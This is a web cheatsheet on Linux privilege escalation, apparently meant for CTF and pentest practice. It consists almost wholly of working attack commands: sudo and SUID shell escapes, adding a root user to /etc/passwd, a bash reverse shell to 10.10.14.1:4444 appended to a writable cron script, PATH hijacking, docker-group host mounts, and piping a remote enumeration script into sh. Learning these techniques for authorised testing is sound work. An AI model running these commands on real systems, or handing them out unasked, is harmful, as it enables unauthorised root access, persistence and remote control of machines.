home / privilege-escalation
🔺 privilege escalation

Linux Privesc Cheatsheet

The full methodology — SUID, sudo, capabilities, cron, writable paths, and kernel exploits. Commands you'll actually use.

32 techniques 10 quiz questions medium difficulty by niklas-heringer.com
initial enumeration
system info
# Basic system recon id && whoami && hostname uname -a cat /etc/os-release cat /proc/version
quick wins — automated
# Upload and run linpeas curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Or LinEnum wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh && ./LinEnum.sh
sudo misconfigurations
enumerate sudo
sudo -l # Look for NOPASSWD entries or specific binaries # Cross-reference at: https://gtfobins.github.io
common sudo escapes
# vim / vi sudo vim -c ':!bash' # less / man sudo less /etc/passwd # then: !/bin/bash # find sudo find . -exec /bin/bash \; -quit # awk sudo awk 'BEGIN {system("/bin/bash")}' # python sudo python3 -c 'import os; os.system("/bin/bash")'
SUID / SGID binaries
find SUID binaries
find / -perm -4000 -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null # SGID find / -perm -2000 -type f 2>/dev/null # Both find / -perm /6000 -type f 2>/dev/null
useful SUID exploits
# bash (if SUID) /bin/bash -p # cp — overwrite /etc/passwd openssl passwd -1 -salt hack password123 echo 'root2:$1$hack$...:0:0:root:/root:/bin/bash' >> /etc/passwd # nmap (older versions) nmap --interactive nmap> !sh
capabilities
find capabilities
getcap -r / 2>/dev/null # Dangerous capabilities to look for: # cap_setuid → set UID to 0 # cap_net_raw → raw socket access # cap_dac_override → bypass file permissions
python cap_setuid exploit
# If python3 has cap_setuid+ep python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
cron job abuse
enumerate cron
cat /etc/crontab cat /etc/cron.d/* ls -la /var/spool/cron/crontabs/ crontab -l # Monitor what runs (pspy) ./pspy64 # github.com/DominicBreuker/pspy
writable cron script exploit
# If a cron script is world-writable: echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1' >> /path/to/cron/script.sh # Or add SUID to bash: echo 'chmod +s /bin/bash' >> /path/to/cron/script.sh # Then: bash -p
writable paths & files
find writable files
# World-writable files find / -writable -type f 2>/dev/null | grep -v proc # Writable directories find / -writable -type d 2>/dev/null # Check /etc/passwd writable ls -la /etc/passwd /etc/shadow /etc/sudoers
PATH hijacking
# If a SUID binary calls a command without full path strings /usr/bin/suid-binary | grep -v '/' # Create malicious binary in writable dir echo '/bin/bash' > /tmp/curl chmod +x /tmp/curl export PATH=/tmp:$PATH ./suid-binary
quick reference — vectors
VectorCheckExploit pathRisk
sudo -lAny NOPASSWD entriesGTFOBins shell escapecritical
SUID bashfind / -perm -4000bash -pcritical
Writable /etc/passwdls -la /etc/passwdAdd root user manuallycritical
cap_setuidgetcap -r / 2>/dev/nullpython3 os.setuid(0)critical
Writable cron scriptpspy + ls -laAppend reverse shellhigh
PATH hijackingstrings on SUID binsFake binary in $PATHhigh
Kernel exploituname -a → searchsploitCompile & run PoChigh
Docker groupid | grep dockerdocker run -v /:/mnt alpinecritical

// quiz — test yourself

1 / 10

score: 0

Want deeper writeups with real HTB machines using these techniques?

read the blog posts →